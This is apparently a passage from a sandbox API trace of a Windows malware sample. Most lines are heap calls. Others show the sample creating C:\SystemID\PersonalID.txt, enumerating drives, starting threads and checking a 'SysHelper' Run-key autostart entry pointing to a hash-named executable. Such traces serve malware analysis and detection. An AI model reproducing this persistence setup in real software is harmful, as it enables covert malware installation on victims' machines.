RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x1d0) returned 0x2b4afc0 [0112.447] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b7dc88 | out: hHeap=0x2a0000) returned 1 [0112.447] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2b7) returned 0x2b942c0 [0112.447] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4afc0 | out: hHeap=0x2a0000) returned 1 [0112.447] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x412) returned 0x2bb5a70 [0112.448] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b942c0 | out: hHeap=0x2a0000) returned 1 [0112.448] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x61a) returned 0x2b853a0 [0112.448] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bb5a70 | out: hHeap=0x2a0000) returned 1 [0112.448] GetUserNameW (in: lpBuffer=0x18ec50, pcbBuffer=0x18eac4 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x18eac4) returned 1 [0112.454] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x590) returned 0x2b96530 [0112.467] GetLastError () returned 0x0 [0112.467] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x18) returned 0x2b15940 [0112.467] GetLastError () returned 0x0 [0112.467] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4d830 [0112.467] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b15940 | out: hHeap=0x2a0000) returned 1 [0112.467] GetLastError () returned 0x0 [0112.467] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x48) returned 0x2b388a0 [0112.467] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4d830 | out: hHeap=0x2a0000) returned 1 [0112.468] GetLastError () returned 0x0 [0112.468] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x60) returned 0x2b28688 [0112.468] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b388a0 | out: hHeap=0x2a0000) returned 1 [0112.468] GetLastError () returned 0x0 [0112.468] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x90) returned 0x2bafa88 [0112.468] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b28688 | out: hHeap=0x2a0000) returned 1 [0112.468] GetLastError () returned 0x0 [0112.468] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xd8) returned 0x3631b0 [0112.469] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bafa88 | out: hHeap=0x2a0000) returned 1 [0112.469] GetLastError () returned 0x0 [0112.469] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x138) returned 0x2b7dc88 [0112.469] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x3631b0 | out: hHeap=0x2a0000) returned 1 [0112.469] GetLastError () returned 0x0 [0112.469] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b6fff0 [0112.469] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x1c8) returned 0x2b4afc0 [0112.470] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b7dc88 | out: hHeap=0x2a0000) returned 1 [0112.470] GetLastError () returned 0x0 [0112.470] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b6ffc8 [0112.470] GetLastError () returned 0x0 [0112.470] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b6fe38 [0112.470] GetLastError () returned 0x0 [0112.470] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b6ff00 [0112.470] GetLastError () returned 0x0 [0112.470] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b70298 [0112.470] GetLastError () returned 0x0 [0112.470] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x2a0) returned 0x2b71da8 [0112.471] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4afc0 | out: hHeap=0x2a0000) returned 1 [0112.471] GetLastError () returned 0x0 [0112.471] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b70590 [0112.471] GetLastError () returned 0x0 [0112.471] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4d830 [0112.471] GetLastError () returned 0x0 [0112.471] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4dbb0 [0112.471] GetLastError () returned 0x0 [0112.471] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78848 [0112.471] GetLastError () returned 0x0 [0112.471] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78280 [0112.471] GetLastError () returned 0x0 [0112.471] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78258 [0112.471] GetLastError () returned 0x0 [0112.471] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b781e0 [0112.471] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x3f0) returned 0x2b77bb0 [0112.472] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b71da8 | out: hHeap=0x2a0000) returned 1 [0112.472] GetLastError () returned 0x0 [0112.472] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78168 [0112.472] GetLastError () returned 0x0 [0112.472] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78140 [0112.472] GetLastError () returned 0x0 [0112.472] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b786e0 [0112.472] GetLastError () returned 0x0 [0112.472] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4da28 [0112.472] GetLastError () returned 0x0 [0112.472] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4dad0 [0112.472] GetLastError () returned 0x0 [0112.473] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78730 [0112.473] GetLastError () returned 0x0 [0112.473] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78a00 [0112.473] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x5e8) returned 0x2ab9f90 [0112.473] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b77bb0 | out: hHeap=0x2a0000) returned 1 [0112.473] GetLastError () returned 0x0 [0112.473] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78820 [0112.473] GetLastError () returned 0x0 [0112.473] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b789d8 [0112.473] GetLastError () returned 0x0 [0112.473] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78a28 [0112.473] GetLastError () returned 0x0 [0112.474] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78a50 [0112.474] GetLastError () returned 0x0 [0112.474] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78a78 [0112.474] GetLastError () returned 0x0 [0112.474] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78aa0 [0112.474] GetLastError () returned 0x0 [0112.474] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4db08 [0112.474] GetLastError () returned 0x0 [0112.474] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4db40 [0112.474] GetLastError () returned 0x0 [0112.474] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78ac8 [0112.474] GetLastError () returned 0x0 [0112.474] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78af0 [0112.474] GetLastError () returned 0x0 [0112.474] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78b18 [0112.474] GetLastError () returned 0x0 [0112.474] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78b40 [0112.474] GetLastError () returned 0x0 [0112.475] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78b68 [0112.475] GetLastError () returned 0x0 [0112.475] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78b90 [0112.475] GetLastError () returned 0x0 [0112.475] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x8d0) returned 0x2bbc110 [0112.475] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2ab9f90 | out: hHeap=0x2a0000) returned 1 [0112.475] GetLastError () returned 0x0 [0112.475] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78bb8 [0112.475] GetLastError () returned 0x0 [0112.475] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78be0 [0112.475] GetLastError () returned 0x0 [0112.475] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4dc20 [0112.476] GetLastError () returned 0x0 [0112.476] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x30) returned 0x2b4dc90 [0112.476] GetLastError () returned 0x0 [0112.476] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78c08 [0112.476] GetLastError () returned 0x0 [0112.476] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78c30 [0112.476] GetLastError () returned 0x0 [0112.476] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78c58 [0112.476] GetLastError () returned 0x0 [0112.476] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78c80 [0112.476] GetLastError () returned 0x0 [0112.476] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x20) returned 0x2b78ca8 [0112.476] GetLastError () returned 0x0 [0112.497] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x18e7b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0112.498] GetLastError () returned 0x3 [0112.498] GetLastError () returned 0x3 [0112.498] CreateDirectoryW (lpPathName="C:\\SystemID" (normalized: "c:\\systemid"), lpSecurityAttributes=0x0) returned 1 [0112.499] CreateFileW (lpFileName="C:\\SystemID\\PersonalID.txt" (normalized: "c:\\systemid\\personalid.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x18e7b8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x534 [0112.501] GetFileType (hFile=0x534) returned 0x1 [0112.501] GetLastError () returned 0x0 [0112.524] CreateFileW (lpFileName="I:\\5d2860c89d774.jpg" (normalized: "i:\\5d2860c89d774.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0112.524] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0112.524] RegisterClassExW (param_1=0x18ea30) returned 0xc1c9 [0112.525] CreateWindowExW (dwExStyle=0x0, lpClassName="LPCWSTRszWindowClass", lpWindowName="LPCWSTRszTitle", dwStyle=0xcf0000, X=-2147483648, Y=0, nWidth=-2147483648, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0xc0182 [0112.527] NtdllDefWindowProc_W () returned 0x0 [0112.527] NtdllDefWindowProc_W () returned 0x1 [0112.531] NtdllDefWindowProc_W () returned 0x0 [0112.540] NtdllDefWindowProc_W () returned 0x0 [0112.540] ShowWindow (hWnd=0xc0182, nCmdShow=0) returned 0 [0112.540] UpdateWindow (hWnd=0xc0182) returned 1 [0112.540] GetLogicalDrives () returned 0x4 [0112.540] SetErrorMode (uMode=0x1) returned 0x0 [0112.540] PathFileExistsA (pszPath="C:\\") returned 1 [0112.541] SetErrorMode (uMode=0x0) returned 0x1 [0112.541] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0112.541] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x806) returned 0x2bcd9e0 [0112.541] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e9e8, cbMultiByte=-1, lpWideCharStr=0x2bcd9e0, cchWideChar=1027 | out: lpWideCharStr="C:\\") returned 4 [0112.541] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2b85b40 [0112.542] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2bcd9e0 | out: hHeap=0x2a0000) returned 1 [0112.542] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x18) returned 0x2b15940 [0112.542] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b85b40 | out: hHeap=0x2a0000) returned 1 [0112.542] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b15940 | out: hHeap=0x2a0000) returned 1 [0112.542] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x18) returned 0x2b15940 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x10) returned 0x2b027b8 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x8ec) returned 0x2b85b40 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2bcd9e0 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bd14e8 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x1070) returned 0x2b75008 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x60) returned 0x2b285b8 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2bb6110 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x660) returned 0x2b86438 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bd1d70 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bd25f8 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bd2e80 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bd3708 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bd3f90 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x840) returned 0x2bb6928 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bd4818 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bd50a0 [0112.598] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x840) returned 0x2be2c48 [0112.599] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x850) returned 0x2be3490 [0112.599] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x850) returned 0x2be3ce8 [0112.599] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bd5928 [0112.599] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bd61b0 [0112.599] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x840) returned 0x2be4540 [0112.599] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x840) returned 0x2be4d88 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bd6a38 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bd72c0 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bd7b48 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bd83d0 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bd8c58 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bd94e0 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bd9d68 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bda5f0 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bdae78 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bdb700 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x850) returned 0x2be55d0 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x850) returned 0x2be5e28 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bdbf88 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bdc810 [0112.600] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bdd098 [0112.601] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x840) returned 0x2be6680 [0112.601] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x840) returned 0x2be6ec8 [0112.601] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bdd920 [0112.601] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bde1a8 [0112.601] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bdea30 [0112.601] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bdf2b8 [0112.601] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bdfb40 [0112.601] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2be7728 [0112.602] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2be7fb0 [0112.602] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2be8838 [0112.602] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2be90c0 [0112.602] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x850) returned 0x2bf7710 [0112.602] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x850) returned 0x2bf7f68 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2be9948 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bea1d0 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2beaa58 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x840) returned 0x2bf87c0 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x840) returned 0x2bf9008 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2beb2e0 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bebb68 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bec3f0 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2becc78 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bed500 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bedd88 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bee610 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2beee98 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bef720 [0112.603] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x850) returned 0x2bf9850 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x850) returned 0x2bfa0a8 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2beffa8 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bf0830 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bf10b8 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x840) returned 0x2bf1940 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bf21c8 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bf2a50 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x830) returned 0x2bf32d8 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bf3b60 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bf43e8 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0xc0) returned 0x2b1aba8 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bf4c70 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2bfa900 [0112.604] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2bfb118 [0112.605] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2bfb930 [0112.605] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2bfc148 [0112.605] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2bfc960 [0112.605] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2bfd178 [0112.605] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x810) returned 0x2bf54f8 [0112.605] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x60) returned 0x2b28dd8 [0112.605] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bf5d80 [0112.605] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bf6608 [0112.605] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bfd9a8 [0112.606] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x820) returned 0x2bfe230 [0112.606] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x50) returned 0x2ba14e8 [0112.606] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x2b85b48, dwCreationFlags=0x0, lpThreadId=0x2b027c0 | out: lpThreadId=0x2b027c0*=0xf18) returned 0x52c [0112.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0xf1c) returned 0x538 [0112.608] GetMessageW (in: lpMsg=0x18ebe0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18ebe0) returned 0 [0121.109] NtdllDefWindowProc_W () returned 0x0 [0121.109] NtdllDefWindowProc_W () returned 0x0 [0121.254] NtdllDefWindowProc_W () returned 0x0 [0121.255] NtdllDefWindowProc_W () returned 0x0 [0121.255] NtdllDefWindowProc_W () returned 0x0 [0121.256] NtdllDefWindowProc_W () returned 0x0 [0121.256] NtdllDefWindowProc_W () returned 0x0 [0121.256] NtdllDefWindowProc_W () returned 0x1 [0121.259] NtdllDefWindowProc_W () returned 0x0 [0121.266] NtdllDefWindowProc_W () returned 0x0 [0121.269] NtdllDefWindowProc_W () returned 0x0 [0121.269] NtdllDefWindowProc_W () returned 0x0 [0121.269] NtdllDefWindowProc_W () returned 0x3 [0121.270] NtdllDefWindowProc_W () returned 0x2 [0121.270] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18d2f8 | out: phkResult=0x18d2f8*=0x640) returned 0x0 [0121.270] RegQueryValueExW (in: hKey=0x640, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18d2f4, lpData=0x18ba20, lpcbData=0x18d2d8*=0x400 | out: lpType=0x18d2f4*=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" --AutoStart", lpcbData=0x18d2d8*=0x132) returned 0x0 [0121.271] RegCloseKey (hKey=0x640) returned 0x0 [0121.271] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x140) returned 0x2b80aa0 [0121.271] lstrlenA (lpString="\" --AutoStart") returned 13 [0121.271] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x0, Size=0x120) returned 0x2b766a0 [0121.271] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b80aa0 | out: hHeap=0x2a0000) returned 1 [0121.271] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\fa1eafca-d2cd-4c04-a099-4159a69291ac\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") returned 1 [0121.271] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b766a0 | out: hHeap=0x2a0000) returned 1 [0121.271] IsWindow (hWnd=0xc0182) returned 1 [0121.271] DestroyWindow (hWnd=0xc0182) returned 1 [0121.271] NtdllDefWindowProc_W () returned 0x0 [0121.272] NtdllDefWindowProc_W () returned 0x1 [0121.273] NtdllDefWindowProc_W () returned 0x0 [0121.273] NtdllDefWindowProc_W () returned 0x0 [0121.273] NtdllDefWindowProc_W () returned 0x0 [0121.273] NtdllDefWindowProc_W () returned 0x0 [0121.273] NtdllDefWindowProc_W () returned 0x0 [0121.273] PostQuitMessage (nExitCode=0) [0121.275] NtdllDefWindowProc_W () returned 0x0 [0121.275] CloseHandle (hObject=0x530) returned 1 [0121.275] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b15940 | out: hHeap=0x2a0000) returned 1 [0121.276] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b6fff0 | out: hHeap=0x2a0000) returned 1 [0121.276] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b6ffc8 | out: hHeap=0x2a0000) returned 1 [0121.276] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b6fe38 | out: hHeap=0x2a0000) returned 1 [0121.276] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b6ff00 | out: hHeap=0x2a0000) returned 1 [0121.276] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b70298 | out: hHeap=0x2a0000) returned 1 [0121.277] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b70590 | out: hHeap=0x2a0000) returned 1 [0121.277] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4d830 | out: hHeap=0x2a0000) returned 1 [0121.277] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b4dbb0 | out: hHeap=0x2a0000) returned 1 [0121.277] HeapFree (in: hHeap=0x2a0000, dwFlags=0x0, lpMem=0x2b78848 | out: hHeap=0x2a0000) returned 1 